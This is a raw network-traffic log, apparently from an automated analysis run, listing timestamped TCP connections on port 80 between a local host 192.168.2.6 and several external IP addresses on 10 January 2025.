                                                                                                                    Jan 10, 2025 20:49:10.711013079 CET8049987209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:10.711042881 CET8049987209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:10.711108923 CET4998780192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:11.625132084 CET4998780192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:12.643872023 CET4998880192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:12.649534941 CET8049988209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:12.649663925 CET4998880192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:12.664268017 CET4998880192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:12.670737982 CET8049988209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:13.275042057 CET8049988209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:13.275291920 CET8049988209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:13.275377989 CET4998880192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:14.172020912 CET4998880192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:15.265252113 CET4998980192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:15.270329952 CET8049989209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:15.270437956 CET4998980192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:15.325737953 CET4998980192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:15.330883026 CET8049989209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:15.330976009 CET8049989209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:15.854110956 CET8049989209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:15.854444981 CET8049989209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:15.854513884 CET4998980192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:16.829097986 CET4998980192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:17.848493099 CET4999080192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:17.853514910 CET8049990209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:17.853632927 CET4999080192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:17.863284111 CET4999080192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:17.868170023 CET8049990209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:18.456195116 CET8049990209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:18.456279039 CET8049990209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:18.456389904 CET4999080192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:18.471919060 CET4999080192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:18.476994038 CET8049990209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:23.504332066 CET4999180192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:23.509344101 CET8049991104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:23.509637117 CET4999180192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:23.523698092 CET4999180192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:23.529315948 CET8049991104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:24.120701075 CET8049991104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:24.121984005 CET8049991104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:24.122066975 CET4999180192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:25.031217098 CET4999180192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:26.067079067 CET4999380192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:26.072047949 CET8049993104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:26.072155952 CET4999380192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:26.087872982 CET4999380192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:26.092906952 CET8049993104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:26.676137924 CET8049993104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:26.676649094 CET8049993104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:26.676733971 CET4999380192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:27.594238043 CET4999380192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:28.612410069 CET4999480192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:28.617332935 CET8049994104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:28.617420912 CET4999480192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:28.632553101 CET4999480192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:28.637520075 CET8049994104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:28.637552023 CET8049994104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:29.242144108 CET8049994104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:29.242806911 CET8049994104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:29.242866039 CET4999480192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:29.242912054 CET8049994104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:29.242969036 CET4999480192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:30.140551090 CET4999480192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:31.159280062 CET4999580192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:31.164205074 CET8049995104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:31.164316893 CET4999580192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:31.173302889 CET4999580192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:31.178111076 CET8049995104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:31.809032917 CET8049995104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:31.809735060 CET8049995104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:31.809808969 CET4999580192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:31.809823036 CET8049995104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:31.809871912 CET4999580192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:31.814198971 CET4999580192.168.2.6104.21.112.1
                                                                                                                    Jan 10, 2025 20:49:31.818996906 CET8049995104.21.112.1192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:38.174731016 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:38.179791927 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:38.179946899 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:38.200927973 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:38.205780029 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360182047 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360224962 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360238075 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360251904 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360265017 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360285044 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360296965 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360308886 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.360379934 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:39.367150068 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.367180109 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.367192984 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.367238998 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:39.385046005 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.385062933 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.385149002 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:39.385194063 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.385226011 CET8049996112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:39.385240078 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:39.385319948 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:39.703130007 CET4999680192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:40.721946001 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:40.726850033 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:40.726986885 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:40.747273922 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:40.752109051 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.905973911 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.905993938 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.906017065 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.906028986 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.906042099 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.906054974 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.906069994 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.906081915 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.906090975 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.906131983 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:41.906202078 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:41.912827015 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.912883997 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.912898064 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.912916899 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:41.912962914 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:41.930399895 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.930421114 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.930507898 CET8049997112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:41.930516005 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:41.930557013 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:42.250108957 CET4999780192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:43.268515110 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:43.274535894 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:43.274630070 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:43.289314032 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:43.294132948 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:43.294258118 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.683546066 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.683592081 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.683614016 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.683629036 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.683641911 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.683655024 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.683667898 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.683696032 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.683763027 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.685189962 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.685220957 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.685233116 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.685245037 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.685275078 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.700551987 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.700571060 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.700622082 CET8049998112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:44.700649023 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.700683117 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:44.796911955 CET4999880192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:45.815432072 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:45.820384026 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:45.820524931 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:45.829828024 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:45.834649086 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:46.967080116 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:46.967220068 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:46.967442989 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:46.975423098 CET4999980192.168.2.6112.175.247.179
                                                                                                                    Jan 10, 2025 20:49:46.980268002 CET8049999112.175.247.179192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.077529907 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.082407951 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.082525969 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.100171089 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.105020046 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737390041 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737443924 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737481117 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737517118 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737552881 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737586021 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.737588882 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737629890 CET8050000194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:52.737657070 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:52.737704039 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:53.609559059 CET5000080192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:54.628190041 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:54.633167028 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:54.633249998 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:54.648653030 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:54.653536081 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362905025 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362938881 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362951040 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362962008 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362974882 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.362988949 CET8050001194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:55.363010883 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:55.363070011 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:56.156465054 CET5000180192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.175303936 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.180403948 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.180633068 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.195400953 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.200323105 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.200499058 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836009026 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836025953 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836033106 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836039066 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836047888 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836060047 CET8050002194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:57.836126089 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:57.836210012 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:58.703191996 CET5000280192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:59.722214937 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:59.727140903 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:59.727230072 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:59.736903906 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:49:59.742583990 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378561974 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378587961 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378602028 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378614902 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378626108 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378638983 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378650904 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378665924 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:00.378766060 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:50:00.378952980 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:50:00.383894920 CET5000480192.168.2.6194.9.94.86
                                                                                                                    Jan 10, 2025 20:50:00.388670921 CET8050004194.9.94.86192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:05.418518066 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:05.423377991 CET8050005194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:05.423721075 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:05.437649965 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:05.442549944 CET8050005194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:06.041709900 CET8050005194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:06.042010069 CET8050005194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:06.042071104 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:06.952990055 CET5000580192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:07.971667051 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:07.976625919 CET8050006194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:07.976705074 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:07.991530895 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:07.996535063 CET8050006194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:08.595400095 CET8050006194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:08.595568895 CET8050006194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:08.595628977 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:09.499886990 CET5000680192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:10.519347906 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:10.524219990 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:10.524317026 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:10.539935112 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:10.544780016 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:10.544883966 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:11.158746004 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:11.158765078 CET8050007194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:11.158931017 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:12.047036886 CET5000780192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.066936970 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.071710110 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.071774960 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.080565929 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.085324049 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.689943075 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.689954042 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.689970970 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:13.690180063 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.693033934 CET5000880192.168.2.6194.245.148.189
                                                                                                                    Jan 10, 2025 20:50:13.697777033 CET8050008194.245.148.189192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:27.740206957 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:27.745189905 CET8050009208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:27.745265961 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:27.761631966 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:27.767384052 CET8050009208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:28.268884897 CET8050009208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:28.269010067 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:29.265532017 CET5000980192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:29.270651102 CET8050009208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:30.314347029 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:30.319310904 CET8050010208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:30.319473028 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:30.399625063 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:30.404520988 CET8050010208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:30.842740059 CET8050010208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:30.843004942 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:31.906127930 CET5001080192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:31.910932064 CET8050010208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:32.928545952 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:32.933487892 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:32.933623075 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:33.071135998 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:33.076122046 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:33.076188087 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:33.461766005 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:33.461842060 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:34.593616009 CET5001180192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:34.598541975 CET8050011208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:35.612791061 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:35.618908882 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:35.619015932 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:35.627979040 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:35.632916927 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650183916 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650217056 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650228024 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650233984 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650239944 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650250912 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650266886 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650278091 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650288105 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650299072 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650310993 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.650582075 CET5001280192.168.2.6208.91.197.27
                                                                                                                    Jan 10, 2025 20:50:36.655453920 CET8050012208.91.197.27192.168.2.6
                                                                                                                    Jan 10, 2025 20:50:36.655483961 CET8050012208.91.197.27192.168.2.6
